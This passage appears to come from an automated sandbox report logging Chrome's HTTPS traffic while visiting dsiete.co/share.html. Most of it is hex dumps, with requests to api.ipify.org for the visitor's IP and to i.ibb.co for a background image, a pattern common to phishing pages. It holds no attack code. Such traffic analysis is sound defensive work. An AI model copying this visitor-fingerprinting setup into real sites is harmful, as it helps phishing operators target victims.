                                            2024-12-03 08:57:01 UTC4096INData Raw: 39 45 6e ba 49 a3 2c 13 3a 0f 85 4d ea 4c f4 1c 40 a7 ff 76 9b bc f0 c6 b5 c0 9b 00 96 7b c8 7a 2a 8d 3a 0a 5d 5d 14 8f c6 90 81 39 4a c9 81 35 94 40 c1 a4 e5 7b 2e a1 3b cf 3f a9 6a 39 ad 33 2c 72 f9 06 23 20 02 d1 60 c0 fd 70 3b 3f 11 ba 05 03 a2 36 87 63 81 63 d3 b8 03 53 22 97 7a 0d a3 50 46 e5 c1 55 b7 78 b1 73 72 46 7b 0f b2 b6 c3 81 43 20 f4 f2 51 51 22 73 0b a4 5e 4a 07 62 8a c5 35 1c 44 26 c7 a0 a5 87 0b 29 72 06 56 d0 e1 4b e7 d2 9d 9f aa be 06 f6 ee 67 ff 50 0d 5a bd e8 91 8e 56 af da ff e9 8d cd 25 74 8e 7e ae 48 c1 6b 96 5c 88 0f bd 36 c8 2f bf e0 06 f5 62 0a c6 f0 70 17 65 b1 c3 2c fb c5 8d 2f dc 04 3f ba e6 73 c8 9d e9 26 08 7b 3c 48 9b e5 9d 8b d2 30 89 eb ea fe 90 0b 6d 8d e2 94 47 fc 5d 80 45 2a 97 1a a2 48 3e 49 3b f4 84 e9 d0 bd 96 d0
                                            Data Ascii: 9EnI,:ML@v{z*:]]9J5@{.;?j93,r# `p;?6ccS"zPFUxsrF{C QQ"s^Jb5D&)rVKgPZV%t~Hk\6/bpe,/?s&{<H0mG]E*H>I;
                                            2024-12-03 08:57:01 UTC4096INData Raw: 20 7b 8d d0 d0 97 9d fe 75 35 18 9a 07 f3 7a 07 34 5a 34 2b 41 c7 39 c5 d1 e1 dc 5e d4 ed 55 5f 09 85 87 95 f7 9a 76 51 70 ef 78 8e 1e 77 71 e5 7f 87 14 b4 e6 dc 08 cd 09 2b 3a 64 ef 9d e9 ea 0f 1e bd 4d eb d9 f2 8f 5f ad 36 a4 51 22 18 f3 57 d0 9b 2e 24 a3 61 3c fc 6f 76 89 e8 46 2b 88 5a 67 8b 01 b6 17 3a 8a 9d 6f 60 86 5c d4 4d 57 82 e8 1d 90 1a 1f a1 6e f8 05 c2 d0 cc ed d4 26 3a e9 f0 03 e8 aa f7 48 35 38 1f 88 f7 ac 1b c2 36 7d 01 66 1d 3a 6d fa c0 7e 22 74 2e bc a2 cd 99 20 74 4e f9 09 c2 17 69 15 d2 d4 41 49 3a 70 e7 3e fa d5 d9 b5 69 98 52 cb a9 3c f9 f2 bb d4 bf 9e 5f 4f 1b 91 9f 1c ea 98 af cd b3 ad 7a 34 82 d0 f7 3a f3 4a 35 18 5c 40 a9 60 87 a9 ab cf a4 e8 f6 ad 9f 8a d0 a7 8b 25 8f 3d 8a c0 b9 dc d8 00 25 10 51 7e f0 ae 8b e8 97 1f 3b 71 ab
                                            Data Ascii: {u5z4Z4+A9^U_vQpxwq+:dM_6Q"W.$a<ovF+Zg:o`\MWn&:H586}f:m~"t. tNiAI:p>iR<_Oz4:J5\@`%=%Q~;q
                                            2024-12-03 08:57:01 UTC4096INData Raw: 9a 43 f3 ef bb 50 de 69 32 c1 b3 96 80 4c fe 2c 1c 7a 71 b9 67 e1 a0 77 a0 cb fd e8 ab 1f 52 df d5 29 b2 76 ef 47 01 53 0e 79 a0 e9 61 58 dd d0 65 88 32 2a bb 35 5b dc 7b 5c 62 34 7c bd f9 9b 9a 85 0e eb 9d 0d 78 0e a8 33 a1 76 bb 59 17 a2 fa 9d 9b a9 d4 a1 a3 23 fb 14 d3 9c eb cf 96 f7 99 4c ed ac 26 20 0f 40 16 0e bf 08 7a 16 0e 7a 07 0a fa d8 a7 df 53 0b d7 ef a4 8d 35 6e 72 93 85 c2 56 58 eb 26 2b f9 03 c8 17 37 9a 7f b0 c0 61 ba 47 9d ef 10 f9 c8 7f 07 83 7e 32 62 cf dd 00 d5 d7 87 43 a4 02 3e d2 b1 9b 1d 6f 2e 8b c1 4f e5 76 45 27 1c 79 28 4d 3c ef 68 79 97 c9 b4 ce 7a 02 f2 10 64 e1 14 10 41 cf c2 41 ef 40 41 8f 7e f4 c5 8f cf 53 ab 36 6c a5 2a a7 8f 94 d9 46 3a 8b 83 9a 82 d8 27 47 95 37 fe e2 f4 33 ee 97 c6 c6 b9 8e 1b 9c e3 cb 6c 82 98 c3 b5 ae
                                            Data Ascii: CPi2L,zqgwR)vGSyaXe2*5[{\b4|x3vY#L& @zzS5nrVX&+7aG~2bC>o.OvE'y(M<hyzdAA@A~S6l*F:'G73l
                                            2024-12-03 08:57:01 UTC4096INData Raw: c9 a7 f5 a2 6f 70 f9 d1 9e 16 bb e4 70 b1 b3 a5 ee 83 a5 0e ad d7 02 f0 42 dc 83 1e ae 7c 1d 84 9b dd ed 41 ee 52 87 a8 39 ab 29 e2 8a 0f 63 6f df ec ad a2 11 dd f4 34 f7 56 b1 d0 bb e8 74 91 db ea e4 04 44 d0 3b f9 00 ca e5 0b 81 f6 10 18 f5 cc ff d4 ce 7a 37 7d bb a5 06 96 bc 19 51 f6 1c 2f 1f 69 5e c3 fb f0 3e 0e c2 c3 7a df eb 6a 24 8b d5 ae e5 d0 e7 e9 fc 74 74 4f 33 bd 38 f6 1c 79 6f b4 07 ba 1c 23 04 52 4c 40 1e cc 14 03 96 d3 0b 81 ce 44 80 a3 ee 37 23 e2 5e 4b af 6b 6c a2 9c 9c 1c f2 23 93 ad 1e 75 70 ad ca 4b c3 7b db e9 c5 5b 2e 95 f7 46 67 1a 54 b9 d6 ac 21 20 0f 66 d6 0c b5 dc a8 10 68 3f 81 cb 9f 78 5f 79 1a 6a a8 cc e8 a6 87 46 5f 26 ef 8d f6 a3 94 23 85 40 ca 08 c8 83 99 32 b4 72 62 21 20 04 84 80 10 10 02 e9 23 20 82 9e 3e d6 f2 49 42 40
                                            Data Ascii: oppB|AR9)co4VtD;z7}Q/i^>zj$ttO38yo#RL@D7#^Kkl#upK{[.FgT! fh?x_yjF_&#@2rb! # >IB@
                                            2024-12-03 08:57:02 UTC4096INData Raw: 1b 50 64 0f 39 de 4d 28 36 55 4b 9f 3e f9 af 1f 9d e3 9a 59 9f ab af d6 6e a2 1a a7 9b ac 08 2a f4 a0 fc ae 07 75 02 bc b8 4f 2e 0a 6d c1 73 90 63 d1 53 8e 21 48 fd fb 94 d1 cc 6b e3 af c4 f7 ab d1 93 54 95 4f 8f fa fd 16 54 8f 34 91 cd 91 47 b5 4d 3e 72 06 e0 6a e7 06 4e 60 68 43 39 5f 67 d5 36 cc b7 62 94 f3 75 a1 fb 23 0a 03 a3 12 20 17 a7 e6 b2 ff 56 f2 22 7b c1 4d ef 4c 94 12 d2 e9 d2 a2 b8 26 5c ba 2e aa 2b 7f 4e ff 6b 66 a8 3a 95 47 e6 fc 32 6a 6a a8 45 da 9a 8b 7e ff b3 a1 74 ff 1f 3a b6 d5 e4 21 57 3f a5 7c d6 52 b8 d2 f4 a4 47 3d f8 52 a4 ad 2d 69 25 e8 bf be e5 59 b5 a3 01 2d 5d ad f9 b0 0c 15 d5 bb bd 64 b1 a2 da 1d 5e c6 36 9b 0d 2f 4f b4 75 85 b0 06 21 ee 8d 0d 0d e8 e3 e1 a6 f2 1c 33 1d d6 b3 90 5e b8 2e b1 52 98 e7 3f fa 8e 5a b7 65 17 6d
                                            Data Ascii: Pd9M(6UK>Yn*uO.mscS!HkTOT4GM>rjN`hC9_g6bu# V"{ML&\.+Nkf:G2jjE~t:!W?|RG=R-i%Y-]d^6/Ou!3^.R?Zem


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.449750104.26.13.2054433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:01 UTC584OUTGET /?format=json HTTP/1.1
                                            Host: api.ipify.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Origin: https://dsiete.co
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:01 UTC463INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 21
                                            Connection: close
                                            Access-Control-Allow-Origin: *
                                            Vary: Origin
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 8ec258ca1e170f9d-EWR
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1533&rtt_var=580&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1162&delivery_rate=1880231&cwnd=193&unsent_bytes=0&cid=07a94863478a5696&ts=461&x=0"
                                            2024-12-03 08:57:01 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                            Data Ascii: {"ip":"8.46.123.228"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.44974791.134.9.1604433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:01 UTC575OUTGET /GkzpGyh/bg.jpg HTTP/1.1
                                            Host: i.ibb.co
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:02 UTC381INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 03 Dec 2024 08:57:02 GMT
                                            Content-Type: image/jpeg
                                            Content-Length: 161114
                                            Connection: close
                                            Last-Modified: Thu, 26 Oct 2023 23:17:54 GMT
                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                            Cache-Control: max-age=315360000
                                            Cache-Control: public
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, OPTIONS
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:02 UTC3715INData Raw: ff d8 ff e1 0c af 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 b0 00 00 01 01 00 03 00 00 00 01 02 c5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 31 3a 32 31 20 31 33 3a 34 31 3a 34 32 00 00 00 00 04 90 00 00 07 00
                                            Data Ascii: ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2020:01:21 13:41:42
                                            2024-12-03 08:57:02 UTC4096INData Raw: 6f 6f 6c 00 00 00 00 00 49 6e 74 72 62 6f 6f 6c 00 00 00 00 00 42 63 6b 67 4f 62 6a 63 00 00 00 01 00 00 00 00 00 00 52 47 42 43 00 00 00 03 00 00 00 00 52 64 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 47 72 6e 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 6c 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 72 64 54 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 42 6c 64 20 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 52 73 6c 74 55 6e 74 46 23 50 78 6c 40 52 00 00 00 00 00 00 00 00 00 0a 76 65 63 74 6f 72 44 61 74 61 62 6f 6f 6c 01 00 00 00 00 50 67 50 73 65 6e 75 6d 00 00 00 00 50 67 50 73 00 00 00 00 50 67 50 43 00 00 00 00 4c 65 66 74 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 54
                                            Data Ascii: oolIntrboolBckgObjcRGBCRd doub@oGrn doub@oBl doub@oBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@RvectorDataboolPgPsenumPgPsPgPCLeftUntF#RltT
                                            2024-12-03 08:57:02 UTC4096INData Raw: a0 ed 44 01 cd 73 40 de e8 74 ff 00 81 82 d4 c6 a6 8d c1 c1 c4 ee 30 07 a3 a9 9e df d5 4a 95 c5 e0 16 73 ec 2e 6d 5b 9f c8 70 77 ae c9 d7 8f cc f7 26 0e 79 61 6b ad 76 e2 75 fd 61 92 23 fb 0a 67 d5 27 f3 c1 03 48 35 6b ff 00 99 24 e6 17 cf f3 8d 2d 12 5e 0d 5e ed 7c 12 57 13 12 6e 0d 24 5e e0 e2 3d ad 37 b2 23 f7 be 8a b4 ca 29 79 6b 5b 9b 61 7f 30 2c 6c 9e ff 00 ba ab 92 f7 06 90 5c e0 75 12 6a 11 0a d5 38 b6 3b d3 b9 b7 16 0d 09 66 d6 13 1f bb bd a3 fe a5 25 59 6e a4 92 49 21 05 9f cf b5 01 ad ab 7d c3 ec ae 1f a4 92 7f 7c 91 fc e8 d5 1e cf e7 da 99 f9 15 d6 4b 5e 48 8e fb 4c 7c 8a 4a 63 55 75 0b 25 b4 1a c8 e1 e7 8f ca 87 d6 3f e4 7c ff 00 fc 2d 77 fd 43 91 3e d9 8f fb c7 98 fa 25 57 ea d6 b6 ce 8f d4 36 ce 98 d7 72 08 ff 00 06 ef 14 94 ff 00 ff d4 f4
                                            Data Ascii: Ds@t0Js.m[pw&yakvua#g'H5k$-^^|Wn$^=7#)yk[a0,l\uj8;f%YnI!}|K^HL|JcUu%?|-wC>%W6r
                                            2024-12-03 08:57:02 UTC4096INData Raw: 0e 41 64 6f 62 65 00 64 40 00 00 00 01 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 02 02 02 02 02 02 02 02 02 02 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 01 01 01 01 02 02 01 02 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 ff c0 00 11 08 02 86 04 b0 03 01 11 00 02 11 01 03 11 01 ff dd 00 04 00 96 ff c4 01 a2 00 00 00 06 02 03 01 00 00 00 00 00 00 00 00 00 00 07 08 06 05 04 09 03 0a 02 01 00 0b 01 00 00 06 03 01 01 01 00 00 00 00 00 00 00 00 00 06 05 04 03 07 02 08 01 09 00 0a 0b 10 00 02 01 03 04 01 03 03 02 03 03 03 02 06 09 75 01 02 03 04
                                            Data Ascii: Adobed@u
                                            2024-12-03 08:57:02 UTC4096INData Raw: 82 93 6f 42 36 20 b7 4e 18 5e c6 4c 8c e8 ab 28 6b 90 38 6f ad fd b1 73 b2 98 50 92 bd 3d 6d bc 09 58 0a e3 a1 ff 00 03 96 8e 68 11 99 87 20 1f 61 4b ab 7d 0c 45 3a 14 db 4f a9 41 af 4b 7a 79 e3 90 0b 5b d9 7b 29 1d 18 2b 03 d7 55 ac b1 c4 ee bf ea 49 ff 00 63 ee 9d 39 d1 6f ec 0d df 2e 2c 4b a5 88 d2 5b f3 6f eb fe c7 df ba f7 45 a2 b7 b7 ea 22 a8 65 32 9f d5 6f a9 fe bf 8f 7e eb dd 2f 76 6f 65 d4 64 2a 23 52 e4 ea 61 f9 3c 1e 0f e6 fe fd d7 ba 38 3b 5e b4 d6 d3 c6 e7 9b a8 e7 fd 85 ff 00 de 3d fb af 74 ad 95 00 17 b5 bf df 5f df ba f7 5c 61 40 dc da ff 00 ef ad ef dd 7b a6 ac d5 40 a5 81 db e8 40 bf fb 61 fd 7e 9e fd d7 ba 2b 9b cb 7f b6 3e 79 11 64 b5 89 1f 5b 7d 0f fb 6f 7e eb dd 07 30 76 a4 8f 30 5f 2f d0 8f cf f5 f7 ee bd d0 f1 b1 b7 71 c9 f8 c1 7d
                                            Data Ascii: oB6 N^L(k8osP=mXh aK}E:OAKzy[{)+UIc9o.,K[oE"e2o~/voed*#Ra<8;^=t_\a@{@@a~+>yd[}o~0v0_/q}
                                            2024-12-03 08:57:02 UTC4096INData Raw: af 75 0d 45 9f 57 e3 8f f8 8f f8 a7 bf 75 ee a7 02 0a 81 fe c3 de 8f 5a 27 87 49 1d c3 89 5c 8d 3c 91 b2 df 50 3f ef 5e d6 da dc 18 1d 48 3d 20 bb 80 4c 85 48 e8 a9 6e 8e 97 a6 c8 57 9a 8f b7 04 97 d5 fa 07 f5 bf f4 f6 38 b3 e6 69 22 8b 47 89 e5 d0 22 ef 97 92 49 35 e8 e8 4d eb fd 87 1e 09 63 55 88 2d ad f8 b7 d3 d9 26 eb ba 1b aa 92 d5 e8 ef 6c db 05 bd 00 1d 18 2a 54 f1 c6 ab f8 02 de c2 92 1a 92 7a 14 46 94 14 e9 b7 2f 49 f7 10 ba d8 1b 82 3f d7 f7 e0 3d 7a 73 a0 17 70 6d 62 67 69 16 3b fd 4f d0 fb b7 5e e9 3d 0e df 72 c1 3c 56 fa 03 c7 fb ef af bf 75 ee 85 2d ad 82 34 e5 1b 46 9f a7 e3 f3 c0 ff 00 78 f7 ee bd d0 b4 90 81 08 5b 7e 2d fe f1 ff 00 1a f7 ee bd d0 75 ba 70 02 b9 1f d3 c9 ff 00 0f f0 3f d3 df ba f7 40 8d 66 ca 9f cc 74 c6 4f 26 e4 0f c5 fd
                                            Data Ascii: uEWuZ'I\<P?^H= LHnW8i"G"I5McU-&l*TzF/I?=zspmbgi;O^=r<Vu-4Fx[~-up?@ftO&
                                            2024-12-03 08:57:02 UTC4096INData Raw: 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b
                                            Data Ascii: ^d+{}OuI?'z^d+{}OuI?'z^d+{}OuI?'z^d+{}OuI?'z^d+{}OuI?'z^d+
                                            2024-12-03 08:57:02 UTC4096INData Raw: d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e e9 8b 34 74 d3 c8 47 e1 7f e2 3d fb af 74 54 37 ee 5d e9 e4 93 4b db 93 7f f7 9f 7e eb dd 04 14 bb 82 49 6a 74 eb 36 d5 fd 4f bf 75 ee 85 9c 2c ed 34 6a c4 fd 6d
                                            Data Ascii: u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^4tG=tT7]K~Ijt6Ou,4jm
                                            2024-12-03 08:57:02 UTC4096INData Raw: b8 b5 bf af b5 c0 d4 74 13 65 d2 69 d6 33 97 84 1b 6b 1f f2 57 fc 6f de ba d7 59 d3 27 09 17 d6 3f db ff 00 5f f7 9f 7e eb dd 72 39 48 05 fd 6a 3f d8 f3 fe f3 ef dd 7b ae 1f c5 69 cf fb b0 7f b7 5f 76 a7 d9 d7 ba e3 2e 56 15 17 0e 3e 84 f0 47 fb c7 ba f5 ee 9a a4 dc b4 d1 b6 93 28 bf f8 9f 7a eb 74 f5 eb 8a ee 7a 53 fe ed 5f f6 e3 fe 2b ef d4 f9 75 e3 f2 ea 6c 19 b8 67 36 57 06 ff 00 4e 7f e2 9e f7 4e bd 4e 9f 62 95 65 50 41 f7 ee b5 d6 5f 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e 3f 43 ef dd 7b a0 93 b4 3f e2 c3 5d ff 00 2c 25 ff 00 a1 4f b7 54 64 74 d4 9c 3a d3 13 f9 b1 8f dc cc dc 7f 6a a3 fd b7 ab d9 dd 99 c0 e8 86 f0 e0 e7 af ff d4 de d3 3d 0b 4b 4f 20 5b dc 86 fc 7d 07 fc 6f df ba f7 45 27 7a ed da e9 ea 65 31 a3 1f
                                            Data Ascii: tei3kWoY'?_~r9Hj?{i_v.V>G(ztzS_+ulg6WNNNbePA_~{^u~{^?C{?],%OTdt:j=KO [}oE'ze1
                                            2024-12-03 08:57:02 UTC4096INData Raw: c6 9d 35 e2 7b 2a 8e 66 01 a7 4f af 3e a1 fe c7 f3 ee e0 57 a6 c3 54 fc fa 5a 45 be 71 ec 07 ef a7 fc 94 3f e2 be e8 cb d3 cb e5 d7 53 6f 9a 00 3f cf a7 fc 94 3f e2 be fc 01 eb 75 35 e9 07 9b ec aa 3a 62 6d 50 9c 7d 2c c3 de c5 7a f6 aa 75 87 0f d9 d4 75 0c 01 a8 5e 7e be a1 ff 00 15 f7 7d 38 ea 81 ea 7a 5c c5 bf 68 0a df ce 9f 4f f5 43 de 80 ea fc 47 52 e1 df 34 52 30 51 3a 1f a7 f6 87 b7 74 f5 b0 31 d3 c0 dc 70 49 11 75 90 1b 0b fd 7d e8 8c 75 ee 83 3c ff 00 60 c3 41 31 4f 28 16 36 fd 40 7f be bf ba f5 ee b9 e1 fb 16 92 a2 da a7 53 7f f6 a1 fe df df ba f7 4a d3 be a8 44 77 f3 a7 f5 fd 43 fd f7 d3 de ba d5 7a 6a 93 b1 68 51 ca 99 d7 fe 4a 1f f1 5f 7e 06 bd 6f a9 d4 fb fe 81 80 fd f4 e4 7f aa 1f f1 5f 76 a7 5e ea 59 df 94 1f f1 dd 3f e4 a1 ef 78 f4 ea a4
                                            Data Ascii: 5{*fO>WTZEq?So??u5:bmP},zuu^~}8z\hOCGR4R0Q:t1pIu}u<`A1O(6@SJDwCzjhQJ_~o_v^Y?x


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.449739173.254.24.564433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:03 UTC584OUTGET /favicon.ico HTTP/1.1
                                            Host: dsiete.co
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://dsiete.co/share.html
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:03 UTC304INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:03 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Mon, 28 Jan 2019 16:36:43 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 43
                                            Cache-Control: max-age=604800
                                            Expires: Tue, 10 Dec 2024 08:57:03 GMT
                                            Content-Type: image/x-icon
                                            2024-12-03 08:57:03 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 01 07 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                            Data Ascii: GIF89a!,L;


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.449752104.26.12.2054433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:03 UTC349OUTGET /?format=json HTTP/1.1
                                            Host: api.ipify.org
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:03 UTC430INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 21
                                            Connection: close
                                            Vary: Origin
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 8ec258d5ff8f2369-EWR
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1780&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=1601755&cwnd=142&unsent_bytes=0&cid=bacfcd5940909f46&ts=472&x=0"
                                            2024-12-03 08:57:03 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                            Data Ascii: {"ip":"8.46.123.228"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.44975491.134.10.1684433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:04 UTC346OUTGET /GkzpGyh/bg.jpg HTTP/1.1
                                            Host: i.ibb.co
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:05 UTC381INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 03 Dec 2024 08:57:04 GMT
                                            Content-Type: image/jpeg
                                            Content-Length: 161114
                                            Connection: close
                                            Last-Modified: Thu, 26 Oct 2023 23:17:54 GMT
                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                            Cache-Control: max-age=315360000
                                            Cache-Control: public
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, OPTIONS
                                            Accept-Ranges: bytes
